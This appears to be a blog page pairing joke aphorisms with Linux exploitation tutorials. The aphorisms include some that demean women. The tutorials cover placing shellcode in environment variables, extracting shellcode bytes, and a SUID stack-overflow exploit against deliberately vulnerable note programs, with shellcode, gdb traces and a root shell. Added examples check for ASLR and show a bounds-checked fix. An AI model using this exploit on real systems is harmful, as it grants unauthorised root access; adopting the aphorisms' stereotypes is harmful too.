Augustinian Law CLII

“The simplest way to manipulate weak, half-asleep minds is by sending them messages on behalf of their future/possible girlfriends.” Dedicated to @Oropher

vendetta

Augustinian Theory IX

“Hickeys are to women what pee is to dogs. They serve to mark their territory, in this case their 'man', and if he already has one, they give him another, even bigger one.” Dedicated to Anais

vendetta

Augustinian Investigations I

“Recent Augustinian research estimates that 1 in 3 women drop their cell phone into the toilet at least once in their lives.”

vendetta

12 Corazones Belindosos

Based on the world-famous television program 12 Corazones… 12 Corazones Belindosos arrives in your RSS reader!!!!

(Applause)

12 hearts (or those trying to be) competing in a series of contests created especially by the famous blog-television producer Diana Gabriela Navarrete, hosted by Tanusa, with the help of Urkonn-O, our psychic-chemist, who will help the hearts find the best way to win over the unconquerable BelindoooooooooooFan!!!

(Applause)

Challenges, compromising questions, competitions. Who will win? Who will take him home?… Who will eat the pizza that comes with @BelindoFan!??… 12 Corazones Belindosos… you can't miss it

Open casting… 4 hearts still needed

P.S. Design and artwork by @kikitopechocho.

Congratulate me!

The macho, womanizing, free-living Augustito has tied the knot!

Augustinian Law CLI

“The emotions and feelings people believe they feel are nothing more than a biological response of the organism. An excess of endorphins followed by a brain response based on visual stimuli and pheromones… love is nothing but a myth.” Dedicated to February 14th

vendetta

Augustinian Law CL

“The only thing that works between men and women is sex.”

vendetta

Allocating shellcodes into environment variables

When the attacked buffer is small, a good trick is to place the shellcode in an environment variable, obtain that variable's address and pass it to the vulnerable program.

#include <stdio.h>
#include <stdlib.h>

/* Print the address at which the named environment variable is stored. */
int main(int argc, char *argv[]) {
    if(argc < 2) {
        fprintf(stderr, "usage: %s VARIABLE\n", argv[0]);
        return 1;
    }
    printf("%s is at %p\n", argv[1], getenv(argv[1]));
    return 0;
}

See how you can exploit vulnerable code with this trick:

vendetta@pwned:~/booksrc $ gcc getenv_example.c -o getenv_example
vendetta@pwned:~/booksrc $ ./getenv_example SHELLCODE
SHELLCODE is at 0xbffff930
vendetta@pwned:~/booksrc $ ./notesearch $(perl -e 'print "\x30\xf9\xff\xbf"x40')
[DEBUG] found a 24 byte note for user id 501
-------[ end of note data ]-------
sh-3.2# exit
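Whether that address stays put is the first thing to check on a current system: ASLR randomises the stack, and with it the environment block, on every exec, so a fixed value like 0xbffff930 only works when randomisation is off. The program below is an added example (not part of the original post): it re-executes itself a few times and reports whether getenv() returns the same address on each run. The `--child` flag and the choice of PATH as the probed variable are assumptions made for this example; it assumes a POSIX system with popen().

```c
#define _POSIX_C_SOURCE 200809L   /* popen() under strict -std= modes */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RUNS 5

/* Parse a "0x..." line printed by the child; returns 1 on success, 0 otherwise
 * (glibc prints "(nil)" for a NULL pointer, which is rejected here). */
int parse_addr(const char *line, unsigned long *out) {
    char *end;
    if (line == NULL || strncmp(line, "0x", 2) != 0)
        return 0;
    *out = strtoul(line, &end, 16);
    return end > line + 2;            /* at least one hex digit after "0x" */
}

/* Number of distinct values among n addresses: 1 means the address never moved. */
int count_distinct(const unsigned long *a, int n) {
    int i, j, distinct = 0;
    for (i = 0; i < n; i++) {
        for (j = 0; j < i && a[j] != a[i]; j++)
            ;
        if (j == i)
            distinct++;
    }
    return distinct;
}

/* Verdict used by main(); kept separate so it can be checked on its own. */
const char *aslr_verdict(int distinct, int runs) {
    if (runs == 0)
        return "no samples";
    return distinct > 1 ? "stack randomised (ASLR active)" : "stack address stable";
}

int main(int argc, char *argv[]) {
    unsigned long addrs[RUNS];
    char cmd[600], line[64];
    int i, n = 0;

    if (argc > 1 && strcmp(argv[1], "--child") == 0) {
        /* child: print where our copy of PATH lives in the environment block */
        printf("%p\n", (void *)getenv("PATH"));
        return 0;
    }
    for (i = 0; i < RUNS; i++) {
        FILE *p;
        snprintf(cmd, sizeof cmd, "\"%s\" --child", argv[0]);
        if ((p = popen(cmd, "r")) == NULL) {
            perror("popen");
            return 1;
        }
        if (fgets(line, sizeof line, p) != NULL && parse_addr(line, &addrs[n])) {
            printf("run %d: PATH at %s", i + 1, line);
            n++;
        }
        pclose(p);
    }
    printf("%s\n", aslr_verdict(count_distinct(addrs, n), n));
    return 0;
}
```

Run it as `./aslr_check` from the directory it was built in; five identical addresses reproduce the situation in the session above, differing addresses mean the environment trick has no fixed target on that machine.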

Extracting shellcodes from exploits

This is a little trick for extracting the shellcode from an exploit using Bash.

vendetta@pwned:~/booksrc $ for i in $(head exploit_notesearch.c | grep "^\"" | cut -d\" -f2)
> do
> echo -en $i
> done > shellcode_extract.bin
vendetta@pwned:~/booksrc $ cat shellcode_extract.bin
1�1�1É��Íj
          XQh//shh/bin��Q��S��Ívendetta@pwned:~/booksrc $
vendetta@pwned:~/booksrc $ hexdump -C shellcode_extract.bin
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 89  |//shh/bin..Q..S.|
00000020  e1 cd 80                                          |...|
00000023
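The same extraction written in C, added here as an example rather than taken from the post: a small decoder for the `"\xNN..."` string-literal lines of a C source. It parses the literal itself instead of splitting on quote characters, so it also handles the other C escapes (octal, `\n`, `\"`, `\\`) and rejects a malformed one with an error instead of emitting junk bytes. SAMPLE_SOURCE is a constructed stand-in for exploit_notesearch.c whose literal lines carry the harmless bytes 41 42 43 0a; the byte count and hex listing it prints can be compared against `hexdump -C` as above.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample of the lines such a loop would read: two literal lines
 * carrying the bytes 'A' 'B' and 'C' '\n' (not real shellcode). */
static const char SAMPLE_SOURCE[] =
    "char payload[]=\n"
    "\"\\x41\\x42\"\n"
    "   \"\\x43\\n\";\n"
    "int main(void) { return 0; }\n";

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode one C string literal. `lit` must point at the opening quote; decoding
 * stops at the closing quote (anything after it, such as ';', is ignored).
 * Hex escapes are taken as exactly two digits, the way shellcode strings are
 * written. Returns the number of bytes stored in out, or -1 on a malformed or
 * unterminated literal or when out (max bytes) is too small. */
int decode_c_literal(const char *lit, unsigned char *out, size_t max) {
    size_t n = 0;
    const char *p = lit;
    int c;

    if (*p++ != '"')
        return -1;
    while (*p != '\0' && *p != '"') {
        if (*p != '\\') {
            c = (unsigned char)*p++;
        } else {
            p++;
            if (*p == 'x') {
                int hi = hexval(p[1]), lo = hexval(p[2]);
                if (hi < 0 || lo < 0) return -1;
                c = hi * 16 + lo;
                p += 3;
            } else if (*p >= '0' && *p <= '7') {   /* \NNN octal, up to 3 digits */
                int k;
                c = 0;
                for (k = 0; k < 3 && *p >= '0' && *p <= '7'; k++, p++)
                    c = c * 8 + (*p - '0');
                if (c > 255) return -1;
            } else if (*p == 'n') { c = '\n'; p++; }
            else if (*p == 'r') { c = '\r'; p++; }
            else if (*p == 't') { c = '\t'; p++; }
            else if (*p == '\\' || *p == '"' || *p == '\'') { c = *p++; }
            else return -1;                        /* unknown escape */
        }
        if (n >= max)
            return -1;
        out[n++] = (unsigned char)c;
    }
    if (*p != '"')
        return -1;                                 /* unterminated literal */
    return (int)n;
}

/* Decode every line of `text` that begins (after whitespace) with a quote and
 * concatenate the bytes, as the shell loop above does. Returns the total byte
 * count, or -1 if any literal is malformed. */
int decode_literal_lines(const char *text, unsigned char *out, size_t max) {
    size_t total = 0;
    const char *p = text;

    while (*p != '\0') {
        const char *eol = strchr(p, '\n');
        const char *s;
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        char line[512];

        if (len >= sizeof line)
            return -1;
        memcpy(line, p, len);
        line[len] = '\0';
        s = line;
        while (*s == ' ' || *s == '\t')
            s++;
        if (*s == '"') {
            int n = decode_c_literal(s, out + total, max - total);
            if (n < 0)
                return -1;
            total += (size_t)n;
        }
        p = eol ? eol + 1 : p + len;
    }
    return (int)total;
}

int main(void) {
    unsigned char bytes[256];
    int i, n = decode_literal_lines(SAMPLE_SOURCE, bytes, sizeof bytes);

    if (n < 0) {
        fprintf(stderr, "malformed literal\n");
        return 1;
    }
    printf("%d bytes:", n);                /* compare with `hexdump -C` */
    for (i = 0; i < n; i++)
        printf(" %02x", bytes[i]);
    putchar('\n');
    return 0;
}
```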

Cheers!

Dangerous file/directory permissions

In *NIX systems there are two special permissions used by many important programs (including basic functions of the OS). These special permissions are the SUID and SGID permissions.

You may have read about them on other websites or in books, so I only want to show you the security-related implications. As you know, in Linux (to name one OS) there are files like /etc/passwd where critical information, in this case the passwords, is stored; but did you ever ask yourself how this information is kept separate for all users?

If you run the passwd command in a shell you can change your password, and if you log in as another user and run passwd you change that other user's password, yet all passwords are saved in the same file. How?

Well, if you check the permissions of the passwd command you can see the answer:

vendetta@pwned:~ $ which passwd
/usr/bin/passwd
vendetta@pwned:~ $ ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 29104 2006-12-19 14:35 /usr/bin/passwd
vendetta@pwned:~ $

If you're observant you'll notice that the permissions show an s where the x would be. This is because passwd is root's command, and in theory only a privileged user like root can execute it. However, as mortal users we need to change our passwords, so with this special permission you can execute root's command with temporary root privileges, but with limited capabilities, in this case only modifying our own information.

That's cool…!

Hmm… no! Remember the basic rule of getting shells: if you exploit an application and obtain a shell, that new shell runs as the user that was executing the application. So if you exploit a root's application the new shell runs as root… OMG!!

As an example, imagine this code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>     /* getuid(), write(), close() */
#include <fcntl.h>
#include <sys/stat.h>
#include "functions.h"  /* fatal() and ec_malloc() helpers */

void usage(char *prog_name, char *filename) {
    printf("Usage: %s <data to add to %s>\n", prog_name, filename);
    exit(0);
}

void fatal(char *);
void *ec_malloc(unsigned int);

int main(int argc, char *argv[]) {
    int userid, fd; // file descriptor
    char *buffer, *datafile;

    buffer = (char *) ec_malloc(100);
    datafile = (char *) ec_malloc(20);
    strcpy(datafile, "/var/notes");

    if(argc < 2)
        usage(argv[0], datafile);

    strcpy(buffer, argv[1]);   // copies the argument with no length check

    printf("[DEBUG] buffer @ %p: \'%s\'\n", buffer, buffer);
    printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

    fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
    if(fd == -1)
        fatal("in main() while opening file");
    printf("[DEBUG] file descriptor is %d\n", fd);

    userid = getuid();   // real user id of whoever ran the program

    if(write(fd, &userid, 4) == -1)   // each note is prefixed with the writer's UID
        fatal("in main() while writing userid to file");
    write(fd, "\n", 1);

    if(write(fd, buffer, strlen(buffer)) == -1)
        fatal("in main() while writing buffer to file");
    write(fd, "\n", 1);

    if(close(fd) == -1)
        fatal("in main() while closing file");

    printf("Note has been saved.\n");
    free(buffer);
    free(datafile);
}

This program writes simple notes to /var/notes. The important thing here is that the program marks each note with the UID of the user who wrote it, which is what keeps users' information separate. Compile this program, set the setuid bit (chmod u+s) and change the owner and group to root:root.

Now look at this other code:

#include <stdio.h>
#include <string.h>
#include <unistd.h>     /* getuid(), read(), lseek(), close() */
#include <fcntl.h>
#include <sys/stat.h>
#include "functions.h"  /* fatal() helper */

#define FILENAME "/var/notes"

int print_notes(int, int, char *);   // note printing function
int find_user_note(int, int);        // seek in file for a note for user
int search_note(char *, char *);     // search for keyword function
void fatal(char *);                  // fatal error handler

int main(int argc, char *argv[]) {
    int userid, printing=1, fd; // file descriptor
    char searchstring[100];

    if(argc > 1)                        // if there is an arg
        strcpy(searchstring, argv[1]);  // that is the search string (copied with no length check)
    else                                // otherwise
        searchstring[0] = 0;            // search string is empty

    userid = getuid();
    fd = open(FILENAME, O_RDONLY);   // open the file for read-only access
    if(fd == -1)
        fatal("in main() while opening file for reading");

    while(printing)
        printing = print_notes(fd, userid, searchstring);
    printf("-------[ end of note data ]-------\n");
    close(fd);
}

// a function to print the notes for a given uid that match
// an optional search string; returns 0 at end of file, 1 if there are more notes
int print_notes(int fd, int uid, char *searchstring) {
    int note_length;
    char byte=0, note_buffer[100];

    note_length = find_user_note(fd, uid);
    if(note_length == -1)   // if end of file reached
        return 0;           // return 0

    read(fd, note_buffer, note_length);  // read note data
    note_buffer[note_length] = 0;        // terminate the string

    if(search_note(note_buffer, searchstring))  // if searchstring found
        printf(note_buffer);                    // print the note
    return 1;
}

// a function to find the next note for a given userID;
// returns -1 if the end of the file is reached;
// otherwise, it returns the length of the found note
int find_user_note(int fd, int user_uid) {
    int note_uid=-1;
    unsigned char byte;
    int length;

    while(note_uid != user_uid) {        // loop until a note for user_uid is found
        if(read(fd, &note_uid, 4) != 4)  // read the uid data
            return -1;                   // if 4 bytes aren't read, return end of file code
        if(read(fd, &byte, 1) != 1)      // read the newline separator
            return -1;

        byte = length = 0;
        while(byte != '\n') {             // figure out how many bytes to the end of line
            if(read(fd, &byte, 1) != 1)   // read a single byte
                return -1;                // if byte isn't read, return end of file code
            length++;
        }
    }
    lseek(fd, length * -1, SEEK_CUR);   // rewind file reading by length bytes

    printf("[DEBUG] found a %d byte note for user id %d\n", length, note_uid);
    return length;
}

// a function to search a note for a given keyword;
// returns 1 if a match is found, 0 if there is no match
int search_note(char *note, char *keyword) {
    int i, keyword_length, match=0;

    keyword_length = strlen(keyword);
    if(keyword_length == 0)   // if there is no search string
        return 1;             // always "match"

    for(i=0; i < strlen(note); i++) {   // iterate over bytes in note
        if(note[i] == keyword[match])   // if byte matches next byte in keyword
            match++;                    // get ready to check the next byte
        else {                          // otherwise
            if(note[i] == keyword[0])   // if that byte matches first keyword byte
                match = 1;              // start the match count at 1
            else
                match = 0;              // otherwise it is zero
        }
        if(match == keyword_length)   // if there is a full match
            return 1;                 // return matched
    }
    return 0;   // return not matched
}

This program searches the notes of each user based on their UID. So set the permissions and owner on it the same way.

And finally, look at this code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>    /* bzero() */

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
    unsigned int i, *ptr, ret, offset=270;
    char *command, *buffer;

    command = (char *) malloc(200);
    bzero(command, 200); // zero out the new memory

    strcpy(command, "./notesearch \'"); // start command buffer
    buffer = command + strlen(command); // set buffer at the end

    if(argc > 1) // set offset
        offset = atoi(argv[1]);

    ret = (unsigned int) &i - offset; // set return address

    for(i=0; i < 160; i+=4) // fill buffer with return address
        *((unsigned int *)(buffer+i)) = ret;
    memset(buffer, 0x90, 60); // build NOP sled
    memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

    strcat(command, "\'");
    system(command); // run exploit
    free(command);
}

Compile it with GCC's -g option and examine the debugging information:

vendetta@pwned:/home/vendetta/booksrc $ gdb -q exploit_notesearch
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list
1       #include <stdio.h>
2       #include <stdlib.h>
3       #include <string.h>
4       char shellcode[]=
5       "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
6       "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
7       "\xe1\xcd\x80";
8
9       int main(int argc, char *argv[]) {
10         unsigned int i, *ptr, ret, offset=270;
(gdb)
11         char *command, *buffer;
12
13         command = (char *) malloc(200);
14         bzero(command, 200); // zero out the new memory
15
16         strcpy(command, "./notesearch \'"); // start command buffer
17         buffer = command + strlen(command); // set buffer at the end
18
19         if(argc > 1) // set offset
20            offset = atoi(argv[1]);
(gdb)
21
22         ret = (unsigned int) &i - offset; // set return address
23
24         for(i=0; i < 160; i+=4) // fill buffer with return address
25            *((unsigned int *)(buffer+i)) = ret;
26         memset(buffer, 0x90, 60); // build NOP sled
27         memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
28
29         strcat(command, "\'");
30         system(command); // run exploit
(gdb)
31         free(command);
32      }
33
(gdb) break 26
Breakpoint 1 at 0x80485fa: file exploit_notesearch.c, line 26.
(gdb) break 27
Breakpoint 2 at 0x8048615: file exploit_notesearch.c, line 27.
(gdb) break 28
Breakpoint 3 at 0x8048633: file exploit_notesearch.c, line 28.
(gdb) run
Starting program: /home/vendetta/booksrc/exploit_notesearch

Breakpoint 1, main (argc=1, argv=0xbffff824) at exploit_notesearch.c:26
26         memset(buffer, 0x90, 60); // build NOP sled
(gdb) x/x40 buffer
A syntax error in expression, near `buffer'.
(gdb) x/40x buffer
0x804a016:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a026:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a036:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a046:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a056:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a066:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a076:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a086:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a096:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a0a6:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
(gdb) x/s command
0x804a008:       "./notesearch '\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���"
(gdb) cont
Continuing.

Breakpoint 2, main (argc=1, argv=0xbffff824) at exploit_notesearch.c:27
27         memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
(gdb) x/40x buffer
0x804a016:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a026:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a036:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a046:      0x90909090      0x90909090      0x90909090      0xbffff686
0x804a056:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a066:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a076:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a086:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a096:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a0a6:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
(gdb) x/s command
0x804a008:       "./notesearch '", '\220' <repeats 60 times>, "\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���"
(gdb) cont
Continuing.

Breakpoint 3, main (argc=1, argv=0xbffff824) at exploit_notesearch.c:29
29         strcat(command, "\'");
(gdb) x/40x buffer
0x804a016:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a026:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a036:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a046:      0x90909090      0x90909090      0x90909090      0xdb31c031
0x804a056:      0xb099c931      0x6a80cda4      0x6851580b      0x68732f2f
0x804a066:      0x69622f68      0x51e3896e      0x8953e289      0xbf80cde1
0x804a076:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a086:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a096:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
0x804a0a6:      0xbffff686      0xbffff686      0xbffff686      0xbffff686
(gdb) x/s command
0x804a008:       "./notesearch '", '\220' <repeats 60 times>, "1�1�1�\231���\200j\vXQh//shh/bin\211�Q\211�S\211��\200�\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���\206���"
(gdb) cont
Continuing.
-------[ end of note data ]-------

Program exited normally.
(gdb) q
vendetta@pwned:/home/vendetta/booksrc $ ./exploit_notesearch
-------[ end of note data ]-------
sh-3.2#

As you can see in the GDB output, the consequences of a vulnerability (in this case the use of the strcpy() function) are terrible. But the problem isn't the use of special permissions; in fact they are the best way to administer many things in *NIX systems… the problem was the application.
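Added example, not the post's code: the notesearch argument copy in the vulnerable form shown above next to a hardened one. The buffer keeps the post's searchstring[100]; copy_search_arg, prepare_search and the 200-byte test argument are constructed for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SEARCH_MAX 100   /* same size as notesearch's searchstring[100] */

/* Before: the pattern from notesearch. strcpy() stops only at the NUL of the
 * source, so an argument longer than 99 bytes overwrites whatever follows the
 * buffer on the stack (the saved return address, in the session above).
 * Shown for comparison only; main() never calls it. */
void copy_search_arg_unsafe(char searchstring[SEARCH_MAX], const char *arg) {
    strcpy(searchstring, arg);
}

/* After: measure the source with an upper bound, refuse anything that will not
 * fit together with its terminating NUL, and only then copy. Refusing (rather
 * than silently truncating) keeps the caller's error handling honest and the
 * destination untouched. */
int copy_search_arg(char *dst, size_t dstsz, const char *src) {
    size_t len = 0;
    while (len < dstsz && src[len] != '\0')   /* never reads past dstsz bytes */
        len++;
    if (len >= dstsz)
        return -1;                            /* would overflow: refuse */
    memcpy(dst, src, len + 1);                /* includes the NUL */
    return 0;
}

/* notesearch's argument handling with the check applied. Returns the length of
 * the accepted search string, or -1 when the argument was rejected. */
int prepare_search(int argc, char *argv[], char searchstring[SEARCH_MAX]) {
    if (argc > 1) {
        if (copy_search_arg(searchstring, SEARCH_MAX, argv[1]) != 0) {
            fprintf(stderr, "search string longer than %d bytes rejected\n",
                    SEARCH_MAX - 1);
            return -1;
        }
    } else {
        searchstring[0] = '\0';
    }
    return (int)strlen(searchstring);
}

int main(int argc, char *argv[]) {
    char searchstring[SEARCH_MAX];
    char oversized[200];
    char *fake_argv[3];

    /* Constructed oversized argument, the size class the session above feeds in. */
    memset(oversized, 'A', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';
    fake_argv[0] = "notesearch";
    fake_argv[1] = argc > 1 ? argv[1] : oversized;
    fake_argv[2] = NULL;

    if (prepare_search(2, fake_argv, searchstring) < 0)
        return 1;
    printf("searching for '%s'\n", searchstring);
    return 0;
}
```

Run without arguments it feeds itself the 200-byte string and exits with the rejection message; run with a short argument it proceeds as notesearch would. The same bound has to be applied in notetaker, whose strcpy(buffer, argv[1]) into a 100-byte heap buffer has the same shape.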

Cheers!
